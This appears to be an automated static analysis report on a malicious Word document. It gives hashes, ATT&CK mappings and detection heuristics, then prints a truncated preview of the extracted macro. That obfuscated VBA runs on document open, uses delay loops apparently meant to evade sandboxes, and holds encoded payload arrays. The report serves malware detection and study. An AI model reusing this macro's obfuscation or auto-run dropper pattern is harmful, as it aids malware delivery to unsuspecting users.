Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 85904711c84c26f0…

MALICIOUS

Office (OLE)

244.5 KB Created: 2015-12-20 00:46:00 Authoring application: Microsoft Office Word First seen: 2017-11-29
MD5: 445b264d9e4d49a84eecf310e34fafbf SHA-1: a62d98435385d67978bb1c259bdfc5dd03f227a9 SHA-256: 85904711c84c26f048452f2096201cb82b8e10cf97548bad518d44e5049c9b80
202 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample contains VBA macros, including a Document_Open macro that utilizes the Shell() function for execution. This indicates an attempt to run external code, likely a downloader for a second-stage payload. The heuristic 'SE_PASSWORD_ARCHIVE_LURE' suggests the document may also instruct the user to disable security or provide a password for an archive, a common tactic to bypass gateway scanning.

Heuristics 6

  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Password-protected archive handoff high SE_PASSWORD_ARCHIVE_LURE
    Document gives password instructions for an archive or attachment — often used to keep payloads encrypted until after gateway scanning
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
    • http://purl.org/dc/elements/1.1/In document text (OLE body)
    • http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
    • http://www.iec.chIn document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 45842 bytes
SHA-256: 0b3046f781918dc9b8e4cb2ee912ab308176f2b8fdc5be6237d3a5e0c96ac852
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
#If VBA7 Then
Private Declare PtrSafe Function PKRuK2fNdVxFB Lib "T6lvGFt72exxq" Alias "QcghniC" (ByVal S2fmUIJLe As String, A2Rid9IP8w As Long) As Long
#Else
Private Declare Function PKRuK2fNdVxFB lib "T6lvGFt72exxq" Alias "QcghniC"(byval S2fmUIJLe as String, A2Rid9IP8w as Long ) as Long
#End If
Dim HLnJXH1bmOF3 As String, GyCvq As Integer
Dim GyCvq1() As Variant, GyCvq2() As Variant, GyCvq3() As Variant, GyCvq4() As Variant, GyCvq5() As Variant, GyCvq6() As Variant, GyCvq7() As Variant, GyCvq8() As Variant, GyCvq9() As Variant, GyCvq10() As Variant
Dim GyCvq11() As Variant, GyCvq12() As Variant, GyCvq13() As Variant, GyCvq14() As Variant, GyCvq15() As Variant, GyCvq16() As Variant, GyCvq17() As Variant, GyCvq18() As Variant, GyCvq19() As Variant, GyCvq20() As Variant
Dim GyCvq21() As Variant, GyCvq22() As Variant, GyCvq23() As Variant, GyCvq24() As Variant, GyCvq25() As Variant, GyCvq26() As Variant, GyCvq27() As Variant, GyCvq28() As Variant, GyCvq29() As Variant, GyCvq30() As Variant, GyCvq31() As Variant, GyCvq32() As Variant, GyCvq33() As Variant, GyCvq34() As Variant, GyCvq35() As Variant, GyCvq36() As Variant
Sub Document_Open()
R7O1H2H3zI = 66 + "25"
On Error Resume Next
MD1XgpZ1pvB55y = 22 + "85"
Dim Kf0pgDeD2QME As Long, Bna2eaHvItP2PN As Long, WFoVlONXW2AD As Long, YtJXNbAM10p As Long
Ea7EVpjs = 70 + "46"
Kf0pgDeD2QME = 92238969: Bna2eaHvItP2PN = 0: WFoVlONXW2AD = 0
BzWEvA933 = 88 + "20"
For Bna2eaHvItP2PN = 1 To Kf0pgDeD2QME
WFoVlONXW2AD = WFoVlONXW2AD + 1
Next Bna2eaHvItP2PN
JZL4UQ92uel4B = 23 + "62"
If WFoVlONXW2AD = Kf0pgDeD2QME Then
SeLEK = 56 + "91"
Dim S3VoJ54dB As Integer, B4HWNSKEwh As String
For S3VoJ54dB = 6 To 974
B4HWNSKEwh = B4HWNSKEwh + S3VoJ54dB
Next
JJcm1AOrQT3 = 14 + "18"
YtJXNbAM10p = PKRuK2fNdVxFB("D69lbG7N", 48)
Qio6JWniPunO = 41 + "8"
If (26.5 + 6 + 26.5 - 6) = (26.5 + 8 + 26.5 - 8) Then
SmEqmQo7WIE = 98 + "90"
MYlp4jaVW = 67 + "77"
If zKK(73) = True Then
G2OERK33o = 48 + "8"
SiNwcydd
NsBU3RiWPAsR5kv = 90 + "79"
Else
NhJrp6cE4jcxsT5 = 89 + "58"
MA9o9cPSK5hcO
PMUmGTj7VBjk = 79 + "39"
End If
Else
W1JPoqO = 93 + "45"
MA9o9cPSK5hcO
LIx5J0DQDSAph = 98 + "30"
End If
CxR = 70 + "43"
Else
Yh9QEdd8 = 52 + "97"
MA9o9cPSK5hcO
HxFz4G3yVn = 75 + "27"
End If
HDyHXOIsEi7F = 86 + "94"
End Sub
Sub MA9o9cPSK5hcO()
DRJ9RcaC34U = 10 + "97"
Stop
Partition 58, 6, 35, 21
XmvssUFxoSD = Fix(90)
DateSerial 55, 60, 54
Beep
DateDiff "AyhPtMJO", 63, 89
REQh0kUI80hO = CVErr(10)
Round 50, 76
Resume
Log 51
H6JRAMZiRO1sMhOdf = 20 + "28"
End Sub
Sub JIT9N(PqcAr2DChjNPmswxj As Long)
Ofj = 29 + "74"
Dim MwUs As Long
D8vzZy23Yrz = 26 + "9"
MwUs = Timer + PqcAr2DChjNPmswxj
Do While Timer < MwUs
DoEvents
Loop
KKKBu1p93DmpgX = 77 + "1"
End Sub
Sub SiNwcydd()
G1I0ynas = 45 + "84"
On Error Resume Next
EIbYaWWMmRw = 69 + "45"
GyCvq1() = Array(172, 166, 172, 231, 170, 179, 8, 70, 107, 29, 30, 97, 44, 25, 126, 56, 66, 81, 2, 7, 122, 106, 105, 28, 10, 127, 107, 99, 111, 102, 99, 12, 53, 53, 52, 51, 80, 57, 19, 56, 18, 74, 100, 35, 64, 6, 116, 74, 123, 39, 38, 30, 110, 33, 84, 100, 93, 120, 73, 91, 125, 98, 89, 37, 59, 61, 30, 60, 34, 28, 18, 66, 77, 44, 65, 98, 73, 91, 7, 14, 62, 96, 19, 116, 23, 57, 96, 100, 24, 25, 24, 57, 38, 89, 57, 65, 126, 119, 114, 119, 1, 30, 24, 52, 60, 39, 107, 58, 91, 12, 114, 120, 111, 92, 114, 106, 83, 10, 117, 5, 48, 111, 29, 10, 105, 107, 110, 107, 248, 219, 146, 240, 193, 195, 217, 195, 159, 239, 223, 206, 206, 212, 219, 153, 138, 192, 185, 151, 254, 246, 223, 160, 149, 234, 195, 183, 147, 194, 128, 237, 226, 229, 195, 216, 216, 172, 161, 161, 180, 191, 163, 169, 185, 187, 190, 187, 206, 246, 187, 210, 182, 200, 137, 131, 208, 203, 229, 246, 195, 203, 168, 218, 129, 178, 160, 192, 187, 171, 157, 204, 200, 214, 216)
PeP = 79 + "67"
GyCvq2
... (truncated)